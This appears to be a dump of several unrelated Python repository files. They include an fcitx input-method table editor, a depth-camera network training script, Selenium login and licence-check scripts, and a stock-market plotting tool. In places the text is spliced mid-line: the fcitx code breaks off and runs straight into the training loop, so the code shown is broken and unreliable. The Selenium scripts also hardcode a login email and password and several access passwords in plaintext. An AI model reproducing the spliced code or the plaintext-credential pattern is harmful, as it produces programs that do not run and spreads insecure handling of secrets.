int(i[1])):\n break\n else:\n raise self.autoCodeError('组词失败,因为没有找到对长度为 %d 的词的组词规则' % len(hz))\n\n if msg:\n print('自动造词...')\n if timeit:\n imeitstart = datetime.today()\n a = i[3:].split('+')\n c = ''\n for j in a:\n # 分析一次测试用时 0.06x 秒\n longestHere = -1\n if msg:\n print('分析组词规则...')\n if timeit:\n timeitstart = datetime.today()\n if j[0] == 'p': # 正序\n zx = True\n elif j[0] == 'n': # 逆序\n zx = False\n else:\n raise self.autoCodeError('不能识别的组词规则 %s' % i)\n if zx:\n 字 = hz[int(j[1])-1]\n else:\n 字 = hz[-int(j[1])]\n # 找出最长的编码;五笔有简码的\n longest = 0\n for i in self.search(字):\n length = len(self[i].code)\n if length > longest:\n longest = length\n longestHere = i\n if msg:\n print('分析完毕。')\n if timeit:\n print('用时', datetime.today() - timeitstart)\n try:\n if longestHere == -1:\n raise self.autoCodeError('组词失败,因为我没能找到“%s”的编码' % 字)\n c += self.数据[longestHere].code[int(j[2])-1]\n except IndexError:\n raise self.autoCodeError('组词失败,因为“%s”的编码太短了' % 字)\n\n if msg:\n print('自动造词完毕。')\n if timeit:\n print('用时', datetime.today() - imeitstart)\n return c\n\n def delete(self, code=None, hz=None):\n '''删除指定项,返回删除的条数'''\n count = 0\n\n # 按编码\n if code and not hz:\n pos = self.getpos(code)\n while self.数据[pos].code == code:\n del self.数据[pos]\n count += 1\n # pos = self.getpos(code)\n if count: self.modified = True\n return count\n\n # 按编码和汉字\n # 也可以用 remove,不过这样似乎快一点\n if code and hz:\n pos = self.getpos(code)\n while self.数据[pos].code == code:\n if self.数据[pos].hz == hz:\n count += 1\n del self.数据[pos]\n # 假设没有重复项\n break\n pos += 1\n if count: self.modified = True\n return count\n\n # 只按汉字\n if hz:\n pos = self.search(hz)\n for i in pos:\n # 删一个就少一个\n del self.数据[i-count]\n count += 1\n if count: self.modified = True\n return count\n\n raise self.argsError('code 和 hz 至少要指明一项')\n\n def get(self, record):\n '''\n 获取 record 以便修改\n\n record 是 Record 对象\n '''\n pos = self.getpos(record)\n try:\n while self.数据[pos].code == record.code:\n # 注意到虽然编码排序了,但汉字部分并没有排序\n if self.数据[pos] == record:\n return self.数据[pos]\n else:\n pos += 1\n except IndexError:\n pass\n raise self.RecordNotExist(record)\n\n def getpos(self, record):\n '''获取 record 的位置。如果它不存在,获取它应当被插入的位置\n\nrecord 可以是 Record 对象或者表示编码的字符串'''\n if not isinstance(record, Record):\n record = Record(record, '')\n return bisect.bisect_left(self.数据, record)\n\n def getbycode(self, code):\n '''获取 code 对应的数据'''\n pos = self.getpos(code)\n ret = []\n try:\n while self.数据[pos].code == code:\n ret.append(self.数据[pos])\n pos += 1\n except IndexError:\n pass\n\n return ret\n\n def gethz(self, code):\n '''获取 code 对应的汉字'''\n pos = self.getpos(code)\n ret = []\n try:\n while self.数据[pos].code == code:\n ret.append(self.数据[pos].hz)\n pos += 1\n except IndexError:\n pass\n\n return ret\n\n def getsimilar(self, code, similar=1):\n '''寻找相似的编码(相似度小于等于 similar 者)'''\n # 测试用时 (查询编码的长度).x 秒\n\n # 列出所有编码\n # 测试用时 0.0x 秒\n if msg:\n print('查询相似编码...')\n if timeit:\n imeitstart = datetime.today()\n if not self.编码:\n if msg:\n print('生成编码集合...')\n if timeit:\n timeitstart = datetime.today()\n for i in self.数据:\n self.编码.add(i.code)\n if msg:\n print('编码集合生成完毕。')\n if timeit:\n print('用时', datetime.today() - timeitstart)\n\n ret = []\n for i in self.编码:\n if algorithm.LevenshteinDistance(code, i) <= similar:\n ret.append(i)\n\n if msg:\n print('相似编码查询完毕。')\n if timeit:\n print('用时', datetime.today() - imeitstart)\n return ret\n\n def insert(self, code, hz, hit=0, index=0, ispy=False):\n '''插入记录'''\n if not self.maybeCode(code):\n raise self.argsError('不符合当前码表编码的格式')\n\n t = Record(code, hz, hit, index, ispy)\n try:\n self.get(t)\n # 已经存在\n raise self.RecordExists(t)\n except self.RecordNotExist:\n self.数据.insert(self.getpos(t), t)\n self.modified = True\n\n def load(self, data):\n '''\n 从字符串载入数据\n\n 此字符串应该来源于码表文件\n 通常不需要手动调用此方法\n '''\n start = 0\n\n # 载入码表属性测试用时 0.001x 秒\n # 版本号\n fmt = ' self.码长:\n return False\n for i in string:\n if i not in self.键码:\n return False\n return True\n\n def print(self, 文件=None, 词频=False, 编码='utf-8'):\n '''以纯文本方式输出\n\n如果词频为 False 并且编码为默认的话,所得文件与 mb2txt 程序产生的\n完全一致'''\n\n # 不打印词频时测试用时 2.5x 秒\n # 打印词频时测试用时 2.7x 秒\n if 文件:\n f = open(文件, 'w', encoding=编码)\n else:\n f = sys.stdout\n\n # 打印码表属性 0.0003x 秒\n print(';fcitx 版本', '0x%02x' % self.版本, '码表文件', file=f)\n print('键码='+self.键码, file=f)\n print('码长=%d' % self.码长, file=f)\n if self.拼音长度:\n print('拼音=@', file=f)\n print('拼音长度=%d' % self.拼音长度, file=f)\n if self.规避字符:\n print('规避字符=' + self.规避字符, file=f)\n if self.组词规则:\n print('[组词规则]', file=f)\n for i in self.组词规则:\n print(i, file=f)\n if msg:\n print('打印数据...')\n if timeit:\n timeitstart = datetime.today()\n print('[数据]', file=f)\n lastcode = ''\n tmpRecords = []\n for i in self.数据 :\n if i.code == lastcode:\n tmpRecords.append(i)\n elif tmpRecords:\n tmpRecords.sort(key=lambda x: -x.index)\n for j in tmpRecords:\n print(j.toString(词频), file=f)\n lastcode = i.code\n tmpRecords = [i]\n else:\n lastcode = i.code\n tmpRecords = [i]\n if msg:\n print('打印数据完成。')\n if timeit:\n print('用时', datetime.today() - timeitstart)\n\n def save(self):\n '''保存到原文件'''\n self.write(self.文件名)\n\n def search(self, hz, 搜寻子串=False):\n '''寻找汉字,返回索引列表,搜寻子串 指示是否要准确匹配\n\n返回结果总是排序过的'''\n # 精确匹配时测试用时 0.06x 秒\n # 模糊匹配时测试用时 0.1x 秒\n if msg:\n print('查询汉字...')\n if timeit:\n timeitstart = datetime.today()\n ret = []\n if not 搜寻子串:\n for i in range(len(self.数据)):\n if self.数据[i].hz == hz:\n ret.append(i)\n else:\n for i in range(len(self.数据)):\n if self.数据[i].hz.find(hz) != -1:\n ret.append(i)\n if msg:\n print('汉字查询完成。')\n if timeit:\n print('用时', datetime.today() - timeitstart)\n return ret\n\n def set(self, code, hz, hit=0, index=0, ispy=False):\n '''插入或设置词频信息'''\n # 这个和 insert 方法的有点重复了\n if not self.maybeCode(code):\n raise self.argsError('不符合当前码表编码的格式')\n\n t = Record(code, hz, hit, index, ispy)\n try:\n self.get(t).update(t)\n self.modified = True\n except self.RecordNotExist:\n # 不存在\n self.insert(code, hz, hit, index, ispy)\n\n def size(self):\n '''数据的条数'''\n return len(self.数据)\n\n __len__ = size\n\n def write(self, 文件, 保留词频信息=True):\n '''保存到文件'''\n # 测试用时 3.6x 秒\n f = open(文件, 'wb')\n\n # 写入属性测试用时 0.0006+ 秒\n # 版本号\n fmt = '= len(gen_real) - 1:\n gen_real.on_epoch_end()\n points, correlations, depths, tof_depths, masks, rays = gen_real[iter_batch % len(gen_real)]\n if args.rotate:\n # additional data augmentation by rotating\n angles = np.random.uniform(-args.rotate, args.rotate, args.batch_size) * np.pi / 180\n correlations = tfa.image.rotate(correlations, angles, interpolation=\"BILINEAR\", fill_mode='reflect').numpy()\n depths = tfa.image.rotate(depths, angles, interpolation=\"BILINEAR\", fill_mode='reflect').numpy()\n tof_depths = tfa.image.rotate(tof_depths, angles, interpolation=\"BILINEAR\", fill_mode='reflect').numpy()\n # masks = tfa.image.rotate(masks, angles, interpolation=\"BILINEAR\", fill_mode='reflect')\n masks = depths != 0\n # compute loss only on valid pixels\n ratio = gen_train.valid_ratio(masks)\n # reference loss\n loss = loss_function(y_pred=masks * tof_depths, y_true=masks * depths) * ratio\n epoch_loss_ref_avg.update_state(loss)\n with tf.GradientTape() as tape:\n pred, pred_coarse = model(rays, correlations, tof_depths, training=True)\n loss = loss_function(y_true=masks * depths, y_pred=masks * pred) * ratio\n loss_coarse = loss_function(y_true=masks * depths, y_pred=masks * pred_coarse) * ratio\n total_loss = loss + loss_coarse\n grads = tape.gradient(total_loss, model.trainable_variables)\n optimizer.apply_gradients(zip(grads, model.trainable_variables))\n epoch_loss_avg.update_state(loss)\n epoch_loss_coarse_avg.update_state(loss_coarse)\n if self.loss_str != 'L1':\n l1_loss = tf.keras.losses.mae(y_true=masks * depths, y_pred=masks * pred) * ratio\n epoch_l1_loss_avg.update_state(l1_loss)\n l1_loss_coarse = tf.keras.losses.mae(y_true=masks * depths, y_pred=masks * pred_coarse) * ratio\n epoch_l1_loss_coarse_avg.update_state(l1_loss_coarse)\n if iter_batch % 5 == 0:\n print((\"\\r {:03d} / {:03d} \" + self.loss_str + \"-Loss: {:.4f}, \" + self.loss_str + \"-Loss_coarse: {:.4f} \").format(\n iter_batch, len(gen_train),\n epoch_loss_avg.result(),\n epoch_loss_coarse_avg.result()), end=\"\")\n iter_batch += 1\n # TensorBoard summaries\n if self.log:\n with self.summary_writer.as_default():\n tf.summary.scalar(self.loss_str + '_loss_train', epoch_loss_avg.result(), step=epoch)\n tf.summary.scalar(self.loss_str + '_loss_coarse_train', epoch_loss_coarse_avg.result(), step=epoch)\n tf.summary.scalar('LR', model.optimizer._decayed_lr(float), step=epoch)\n if self.loss_str != 'L1':\n tf.summary.scalar('L1_loss_train', epoch_l1_loss_coarse_avg.result(), step=epoch)\n tf.summary.scalar('L1_loss_coarse_train', epoch_l1_loss_coarse_avg.result(), step=epoch)\n train_loss_results[epoch] = epoch_loss_avg.result()\n train_loss_ref[epoch] = epoch_loss_ref_avg.result()\n gen_train.on_epoch_end()\n\n # --- Validation ---\n epoch_loss_avg.reset_states()\n epoch_loss_coarse_avg.reset_states()\n epoch_loss_ref_avg.reset_states()\n if self.loss_str != 'L1':\n epoch_l1_loss_avg.reset_states()\n\n print()\n for points, correlations, depths, tof_depths, masks, rays in gen_val:\n ratio = gen_val.valid_ratio(masks)\n # reference loss\n loss = loss_function(y_pred=masks * tof_depths, y_true=masks * depths) * ratio\n epoch_loss_ref_avg.update_state(loss)\n\n pred, pred_coarse = model(rays, correlations, tof_depths, training=False)\n loss = loss_function(y_true=masks * depths, y_pred=masks * pred) * ratio\n loss_coarse = loss_function(y_true=masks * depths, y_pred=masks * pred_coarse) * ratio\n epoch_loss_avg.update_state(loss)\n epoch_loss_coarse_avg.update_state(loss_coarse)\n if self.loss_str != 'L1':\n l1_loss = tf.keras.losses.mae(y_true=masks * depths, y_pred=masks * pred) * ratio\n epoch_l1_loss_avg.update_state(l1_loss)\n l1_loss_coarse = tf.keras.losses.mae(y_true=masks * depths, y_pred=masks * pred_coarse) * ratio\n epoch_l1_loss_coarse_avg.update_state(l1_loss_coarse)\n # TensorBoard summaries\n if self.log:\n with self.summary_writer.as_default():\n tf.summary.scalar(self.loss_str + '_loss_val', epoch_loss_avg.result(), step=epoch)\n tf.summary.scalar(self.loss_str + '_loss_coarse_val', epoch_loss_coarse_avg.result(), step=epoch)\n if self.loss_str != 'L1':\n tf.summary.scalar('L1_loss_val', epoch_l1_loss_coarse_avg.result(), step=epoch)\n tf.summary.scalar('L1_loss_coarse_val', epoch_l1_loss_coarse_avg.result(), step=epoch)\n if epoch % epoch_save == 0 or epoch == num_epochs - 1:\n self.save(epoch)\n test_loss_results[epoch] = epoch_loss_avg.result()\n test_loss_ref[epoch] = epoch_loss_ref_avg.result()\n # --- End epoch ---\n time_epoch_end = time.time()\n gen_val.on_epoch_end()\n print('Epoch {:03d} Time: {:.4f}s'.format(\n epoch,\n time_epoch_end - time_epoch_start))\n print('Training: ' + self.loss_str + '-Loss: {:.4f} Reference: {:.4f}'.format(\n train_loss_results[epoch], train_loss_ref[epoch]))\n print('Validation: ' + self.loss_str + '-Loss: {:.4f} Reference: {:.4f}'.format(\n test_loss_results[epoch], test_loss_ref[epoch]))\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--data_dir', '--d', default='data')\nparser.add_argument('--num_epochs', default=300, type=int)\nparser.add_argument('--batch_size', '--bs', default=8, type=int)\nparser.add_argument('--layer_type', default='MCConv_radu')\nparser.add_argument('--feature_type', default='mf_agresti')\nparser.add_argument('--freq', '--f', default=[20], nargs='+', type=int, help='List of frequencies, can be [20, 50, 70]')\nparser.add_argument('--learning_rate', '--lr', default=0.001, type=float)\nparser.add_argument('--lr_decay', '--lr_d', default=0.3, type=float)\nparser.add_argument('--lr_d_steps', default=100, type=int)\nparser.add_argument('--static_lr', action='store_true')\nparser.add_argument('--noise_level', default=0.02, type=float, help='level of noise used during training (relative)')\nparser.add_argument('--rotate', default=5, type=float, help='additional augmentation by rotating by small number of degrees')\nparser.add_argument('--log_dir', '--l', default='logs/RADU/', type=str)\nparser.add_argument('--optimizer', '--o', default='ADAM', type=str)\nparser.add_argument('--update_along_z', action='store_true', help='updates depth in global instead of camera coordinates')\nparser.add_argument('--loss', default='MAE', type=str)\nparser.add_argument('--save_all', action='store_true', help='keep all model ckpts instead of only the latest.')\nparser.add_argument('--params', default='v3_avg', help='loads the respective parameters from the model file for the network architecture')\nparser.add_argument('--no_log', action='store_true')\nparser.add_argument('--no_project_back', action='store_true', help='adds a projection from global to camera space at the end of the network')\nparser.add_argument('--patches', action='store_true', help='Train the network on cropped patches of the data')\nparser.add_argument('--patch_size', default=128, type=int, help='size (quadratic) of the patches if patched is enabled.')\nparser.add_argument('--norm', default=None, type=str, help='can be None, `LN`, `Int`')\nparser.add_argument('--use_BN', action='store_true', help='activates batch normalization on the latent features')\nparser.add_argument('--use_BN_3D', action='store_true', help='deactivates batch normalization on the latent features for 3D convs')\nparser.add_argument('--skip_3D', action='store_true', help='skip connection past 3D convs block')\nparser.add_argument('--skip_all', action='store_true', help='skip connections in encoder_decoder architecture')\nparser.add_argument('--skip_to_output', action='store_true', help='skip connection from input depth to output, so network is residual')\nparser.add_argument('--real_ratio', default=0.5, type=float, help='probability of choosing a real data point')\nparser.add_argument('--eval_teacher', default=20, type=int, help='evaluate teacher every x epochs')\nargs = parser.parse_args()\n\n\n\"\"\" Feature Type \"\"\"\n\nif args.feature_type == 'mf_agresti':\n num_input_features = 5\n\n\"\"\" Datasets \"\"\"\n\nif 'agresti' in args.data_dir:\n sets = ['S1', 'S3', 'S2']\n if args.patches:\n size = [args.patch_size, args.patch_size]\n else:\n size = [240, 320]\n gen_train = data_generator_Agresti(\n args.batch_size, sets[0], frequencies=args.freq, height=size[0], width=size[1], keepdims=True,\n aug_crop=True, aug_flip=True, aug_rot=False, aug_noise=True, aug_mpi=False, noise_level=args.noise_level, feature_type=args.feature_type, normalize_corr=(args.norm == 'Int'))\n gen_val = data_generator_Agresti(\n args.batch_size, sets[1], frequencies=args.freq, height=size[0], width=size[1], keepdims=True, pad_batches=True, feature_type=args.feature_type, normalize_corr=(args.norm == 'Int'))\n gen_real = data_generator_Agresti(\n args.batch_size, sets[2], frequencies=args.freq, height=size[0], width=size[1], keepdims=True,\n aug_crop=True, aug_flip=True, aug_rot=False, aug_noise=True, aug_mpi=False, noise_level=args.noise_level, feature_type=args.feature_type, normalize_corr=(args.norm == 'Int'))\n gen_real_ordered = data_generator_Agresti(\n args.batch_size, sets[2], frequencies=args.freq, height=240, width=320, keepdims=True, pad_batches=True, feature_type=args.feature_type, normalize_corr=(args.norm == 'Int'),\n shuffle=False)\n config.INPUT_FEATURES_SHAPE[1:] = [size[0], size[1], num_input_features]\n \n\"\"\" Network Model\"\"\"\n\nfrom code_dl.models import RADU_NN as nn_model\n\nmodel_args = nn_model.model_params(args.params)\n\n\"\"\" Training Hyperparameters\"\"\"\n\n# learning rate\nlearning_rate = args.learning_rate\n\ndecay_steps_LR = args.lr_d_steps # every n-th epoch\nif not args.static_lr:\n decay_rate_LR = args.lr_decay\nelse:\n decay_rate_LR = 1.0\nlearning_rate = tf.keras.optimizers.schedules.ExponentialDecay(\n initial_learning_rate=learning_rate,\n decay_steps=decay_steps_LR * len(gen_train),\n decay_rate=decay_rate_LR,\n staircase=True)\n\ntraining = Training()\nloss_function = training.resolve_loss(args.loss)\noptimizer = training.resolve_optimizer(args.optimizer, learning_rate)\nmodel = nn_model.mymodel(\n **model_args, layer_type=args.layer_type, batch_size=args.batch_size,\n update_along_rays=not args.update_along_z, normalize_features=(args.norm == 'LN'), project_back=not args.no_project_back,\n use_BN=args.use_BN, use_BN_3D=args.use_BN_3D,\n skip_3D=args.skip_3D, skip_all=args.skip_all, skip_to_output=args.skip_to_output)\nmodel.optimizer = optimizer\n\n\"\"\" Training \"\"\"\n\nif not args.no_log:\n training.init_tf_summary_writer(args.log_dir)\n training.init_tf_ckpt_manager(args.log_dir, model, save_all_ckpts=args.save_all)\n\nprint('\\n######################')\nprint('training with ' + args.layer_type + ' network layers')\nprint('training frames: ' + str(gen_train.epoch_size))\nprint('validation_frames: ' + str(gen_val.epoch_size))\nprint('######################\\n')\n\ntraining.domain_adaptation(model, gen_train, gen_val, gen_real, gen_real_ordered, args.num_epochs, loss_function)\n","repo_name":"schellmi42/RADU","sub_path":"code_dl/train_U-DA.py","file_name":"train_U-DA.py","file_ext":"py","file_size_in_byte":14553,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"1323812155","text":"from selenium import webdriver\nimport time\n\n\nclass Auth:\n try:\n link = \"https://axxoncloud-test2.axxonnet.com/\"\n browser = webdriver.Chrome()\n browser.get(link)\n\n # Ваш код, который заполняет обязательные поля\n input1 = browser.find_element_by_css_selector('[placeholder=\"Имя пользователя или email\"]')\n input1.send_keys(\"shaulukhov12@gmail.com\")\n\n input2 = browser.find_element_by_css_selector('[placeholder=\"Пароль\"]')\n input2.send_keys(\"123123\")\n\n # Отправляем заполненную форму\n button = browser.find_element_by_id(\"at-login_page-login_button\")\n button.click()\n\n finally:\n # ожидание чтобы визуально оценить результаты прохождения скрипта\n time.sleep(10)\n # закрываем браузер после всех манипуляций\n browser.quit()\n","repo_name":"shaulukhov12/My_stepik---auto-tests-course","sub_path":"Class3_Selenium/Section1/axxonnet.py","file_name":"axxonnet.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4855607396","text":"from math import log10\nfrom Application.Services.ReadData.ReadOnline.MarketWatchDataGenerator import marketWatchDataGenerator\nfrom Application.Services.ReadData.ReadOnline.MarketWatchDataHandler import marketWatchDataHandler\nfrom Application.Utility.TimeUtility import jalali_to_gregorian\nfrom Application.Utility.Indicators.IndicatorService import calculateSma\nfrom Domain.ImportEnums import *\nfrom Infrastructure.Repository.OnlineDataRepository import onlineData_repo\nimport matplotlib.pyplot as plt\nimport datetime\n\ndate = '1400-06-14'\ndecNum = 5\nperiod = 15\nmaLength = int(100/decNum*15/period)\nlength = int(30/decNum*15/period)\n\ngroups = [marketGroupType.TotalMarket.value] #, marketGroupType.Khodroei, marketGroupType.Daroei\n\ndistinctTimes = onlineData_repo().read_distinct_times_of_day(jalali_to_gregorian(date))\nmarketWatchGen = marketWatchDataGenerator()\nmarketWatchHand = marketWatchDataHandler(groups, None)\nrisingMode = False\ndb = onlineData_repo()\nt1 = datetime.datetime.now() \n\nfor thisTime in distinctTimes[12::decNum]:\n\n print('', thisTime, end= '\\r')\n\n data = db.read_onlineData_by_every_time(thisTime)\n\n marketWatchData = marketWatchGen.get_marketWatchInfo(data)\n\n marketWatchHand.update(marketWatchData)\n\nt2 = datetime.datetime.now() \nprint('\\n', t2-t1)\n\nfor group in groups:\n\n rowNum = 7\n colNum = 2\n\n time = marketWatchHand.time()[group]\n positiveTickersPRC = marketWatchHand.positiveTickersPRC()[group]\n totalValue = marketWatchHand.totalValue()[group]\n buyQueueTickersPRC = marketWatchHand.buyQueueTickersPRC()[group]\n sellQueueTickersPRC = marketWatchHand.sellQueueTickersPRC()[group]\n lastPricePRCAverge = marketWatchHand.lastPricePRCAverge()[group]\n lastPricePRCAvergeMA = marketWatchHand.lastPricePRCAverge_MA(maLength= maLength)[group]\n todayPricePRCAverage = marketWatchHand.todayPricePRCAverage()[group]\n buyQueuesValue = marketWatchHand.buyQueuesValue()[group]\n sellQueuesValue = marketWatchHand.sellQueuesValue()[group]\n # demandValue = marketWatchHand.demandValue()[group]\n # supplyValue = marketWatchHand.supplyValue()[group]\n realPowerLog = marketWatchHand.realPowerLog()[group]\n tickersNumber = marketWatchHand.tickersNumber()[group]\n realPower = marketWatchHand.realPower()[group]\n totalValueDif = marketWatchHand.totalValueDif(length= length)[group]\n lastPricePRCAverge_MA_dif = marketWatchHand.lastPricePRCAverge_MA_dif(maLength= maLength)[group]\n realPowerDif = marketWatchHand.realPowerDif(length = length)[group]\n rpvp = [log10(realPowerDif[i])*totalValueDif[i] for i in range(len(realPowerDif))]\n\n # SellQueuPRC ma\n SQPMA = calculateSma(sellQueueTickersPRC, int(60*15/period), True)\n\n # rising and falling recognition\n #method1\n # xmax = -100\n # xmin = 100\n # mxmax = -100\n # mxmin = 100\n # tradedTimes = []\n # xmin = min(lastPricePRCAverge)\n # for i in range(len(lastPricePRCAverge)):\n # xmax = max(xmax, lastPricePRCAverge[i])\n # mxmax = max(lastPricePRCAverge[max(i-int(25/decNum*15/period), 0):i+1])\n # mxmin = min(lastPricePRCAverge[max(i-int(25/decNum*15/period), 0):i+1])\n\n # if lastPricePRCAverge[i] >= mxmin + 1 and lastPricePRCAverge[i] >= mxmax - 1: # and lastPricePRCAverge[i] >= xmax -15\n # tradedTimes.append(lastPricePRCAverge[i])\n # else:\n # tradedTimes.append(xmin-5)\n\n # indexSlope\n indexSlope = [0 for i in range(len(lastPricePRCAverge))]\n for i in range(1, len(lastPricePRCAverge)):\n indexSlope[i] = lastPricePRCAverge[i] - lastPricePRCAverge[max(i-int(10/decNum*15/period), 0)] # 20\n indexSlope[i] /= ((time[i]-time[max(i-int(10/decNum*15/period), 0)]).total_seconds()/60)\n\n xmin = min(lastPricePRCAverge)\n tradedTimes = [xmin-2 for i in range(len(lastPricePRCAverge))]\n tradeFlag = False\n for i in range(1, len(lastPricePRCAverge)):\n if indexSlope[i] >= 0.2:\n tradeFlag = True\n if indexSlope[i] < 0:\n tradeFlag = False\n if tradeFlag == True:\n tradedTimes[i] = lastPricePRCAverge[i]\n \n # SQP Slope\n sqpSlope = [0 for i in range(len(sellQueueTickersPRC))]\n for i in range(1, len(sellQueueTickersPRC)):\n sqpSlope[i] = sellQueueTickersPRC[i] - sellQueueTickersPRC[max(i-int(20/decNum*15/period), 0)]\n sqpSlope[i] /= ((time[i]-time[max(i-int(20/decNum*15/period), 0)]).total_seconds()/60)\n\n xmin = min(sellQueueTickersPRC)\n sqpTradesTimes = [xmin-0.5 for i in range(len(sellQueueTickersPRC))]\n tradeFlag = False\n for i in range(1, len(sellQueueTickersPRC)):\n if sqpSlope[i] <= -0.05:\n tradeFlag = True\n if sqpSlope[i] > 0:\n tradeFlag = False\n if tradeFlag == True:\n sqpTradesTimes[i] = sellQueueTickersPRC[i]\n\n fig, ax = plt.subplots(nrows=rowNum, ncols=colNum, sharex=True, figsize=(18,18), num= str(group) + date) # (width, height) in inches\n\n ax[0][0].plot(time, positiveTickersPRC, 'blue', label= 'PositiveTickersPRC')\n ax[0][0].legend()\n ax[0][1].plot(time, totalValue, 'blue', label= 'TotalValue')\n ax[0][1].legend()\n ax[1][0].plot(time, buyQueueTickersPRC, 'blue', label= 'BuyQueueTickersPRC')\n ax[1][0].legend()\n ax[1][1].plot(time, sellQueueTickersPRC, 'blue', label= 'SellQueueTickersPRC')\n ax[1][1].plot(time, sqpTradesTimes, 'red')\n ax[1][1].plot(time, SQPMA, 'black')\n ax[1][1].legend()\n ax[2][0].plot(time, lastPricePRCAverge, 'blue', label= 'LastPricePRCAverge')\n ax[2][0].plot(time, tradedTimes, 'red', label= 'tradedTimes')\n ax[2][0].plot(time, lastPricePRCAvergeMA, 'green', label= 'LastPricePRCAvergeMA')\n # ax[2][0].legend()\n ax[2][1].plot(time, todayPricePRCAverage, 'blue', label= 'TodayPricePRCAverage')\n ax[2][1].legend()\n ax[3][0].plot(time, indexSlope, 'blue', label= 'indexSlope')\n ax[3][0].plot(time, [0 for i in range(len(time))], 'black')\n ax[3][0].legend()\n ax[3][1].plot(time, sellQueuesValue, 'red', label= 'SellQueuesValue')\n ax[3][1].legend()\n ax[4][0].plot(time, realPowerLog, 'blue', label= 'RealPowerLog')\n ax[4][0].plot(time, [1 for i in range(len(time))], 'black')\n ax[4][0].legend()\n ax[4][1].plot(time, buyQueuesValue, 'blue', label= 'BuyQueuesValue')\n ax[4][1].legend()\n ax[5][0].plot(time, realPower, 'blue', label= 'Realpower')\n ax[5][0].plot(time, [1 for i in range(len(time))], 'black')\n ax[5][0].legend()\n ax[5][1].plot(time, totalValueDif, label= 'TotalValueDif')\n ax[5][1].legend()\n ax[6][0].plot(time, lastPricePRCAverge_MA_dif, 'blue', label= 'LastPricePRCAvergeMADif')\n ax[6][0].plot(time, [0 for i in range(len(time))], 'black')\n # ax[6][0].plot(time, [1 for i in range(len(time))], 'green')\n ax[6][0].plot(time, [-1.5 for i in range(len(time))], 'red')\n ax[6][0].legend()\n ax[6][1].plot(time, realPowerDif, label= 'RealpowerDif')\n ax[6][1].plot(time, [1 for i in range(len(time))], 'black')\n ax[6][1].legend()\n # ax[8][0].plot(time, lastPricePRCAverge_MA_dif, label= 'lastPricePRCAverge_MA_dif')\n # ax[8][0].plot(time, [1 for i in range(len(time))], 'black')\n # ax[8][0].legend()\n # ax[8][1].plot(time, realPowerDif1, label= 'RealpowerDif1')\n # ax[8][1].plot(time, [1 for i in range(len(time))], 'black')\n # ax[8][1].legend()\n\n\n fig.tight_layout()\n\n mng = plt.get_current_fig_manager()\n mng.window.state('zoomed')\n\nxline = [[0 for i in range(colNum)] for j in range(rowNum)]\n\nfor i in range(rowNum):\n for j in range(colNum):\n yMin, yMax = ax[i][j].get_ylim()\n xline[i][j], = ax[i][j].plot([min(time), min(time)],[yMin,yMax])\n\ndef on_click(event):\n # get the x and y pixel coords\n if event.inaxes:\n for i in range(rowNum):\n for j in range(colNum):\n xline[i][j].set_xdata(event.xdata)\n fig.canvas.draw()\n fig.canvas.flush_events()\n\nfig.canvas.mpl_connect('button_press_event', on_click)\n\nplt.show()\n\n","repo_name":"shakouri20/BoursePlus","sub_path":"marketWatch.py","file_name":"marketWatch.py","file_ext":"py","file_size_in_byte":7983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12511522245","text":"from paste import request\n\ndef not_found_hook(environ, start_response):\n urlparser = environ['paste.urlparser.not_found_parser']\n first, rest = request.path_info_split(environ.get('PATH_INFO', ''))\n if not first:\n # No username\n return\n environ['app.user'] = first\n environ['SCRIPT_NAME'] += '/' + first\n environ['PATH_INFO'] = rest\n return urlparser(environ, start_response)\n","repo_name":"kiwibrowser/src","sub_path":"third_party/catapult/third_party/Paste/tests/urlparser_data/not_found/user/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"14807455989","text":"from selenium import webdriver\nfrom selenium.common.exceptions import WebDriverException\nfrom bs4 import BeautifulSoup\nimport os, sys\nimport time\nimport re, requests\nfrom os.path import expanduser\n\nERROR_NONE = 0\nERROR_DRIVER = 1\nERROR_UNIDENTIFIED_USER = 2\nERROR_OLD_VERSION = 3\nERROR_FAIL_TO_GET_URL = 4\nERROR_FAIL_TO_DOWNLOAD = 5\n\nUSERCODE_PW = '2813'\nUPDATE_PW = '1231'\nAPPLY_PW = '1824'\nNOTY_PW = '1175'\n\ndef check_version(macId, curVer, driverPath):\n bResult = True\n errCode = ERROR_NONE\n errMsg = ''\n # 크롬창을 띄우지 않는 옵션을 넣는다\n options = get_chrome_options()\n try:\n driver = webdriver.Chrome(driverPath, options=options)\n\n except WebDriverException as exc:\n bResult = False\n errCode = 1\n errMsg = 'ensure chromedriver is installed at {}'.format(driverPath)\n return bResult, errCode, errMsg\n\n driver.implicitly_wait(3)\n url_usercode = 'https://antistereotypes.tistory.com/24'\n driver.get(url_usercode)\n time.sleep(3)\n\n # div class: input - group\n driver.find_element_by_xpath('//*[@id=\"entry24password\"]').send_keys(USERCODE_PW)\n driver.find_element_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/form/fieldset/button').click()\n\n html_usercode = driver.page_source\n soup_usercode = BeautifulSoup(html_usercode, 'html.parser')\n\n classDivs_usercode = soup_usercode.find('div', {'class': 'entry-content'})\n # strUserCodeIniList = classDivs_usercode.find_all('p')\n\n bIncluded = False\n for ini in classDivs_usercode:\n strIni = re.sub('<.+?>', '', str(ini))\n strCode = strIni[strIni.find('=') + 1:]\n if strCode.find(macId) != -1:\n bIncluded = True\n errMsg = '환영합니다! 고객님 :)'\n # ,format(strIni[:strIni.find('=')])\n break\n\n if bIncluded:\n url_update = 'https://antistereotypes.tistory.com/23'\n driver.get(url_update)\n time.sleep(3)\n\n # div class: input - group\n driver.find_element_by_xpath('//*[@id=\"entry23password\"]').send_keys(UPDATE_PW)\n driver.find_element_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/form/fieldset/button').click()\n\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n\n strIniList = soup.find('div', {'class': 'entry-content'})\n\n for ini in strIniList:\n strIni = re.sub('<.+?>', '', str(ini))\n if not strIni.find('PGM_VERSION') == -1:\n strVer = strIni[strIni.find('=')+1:]\n if curVer < float(strVer):\n bResult = False\n errCode = ERROR_OLD_VERSION\n errMsg = '프로그램 업데이트가 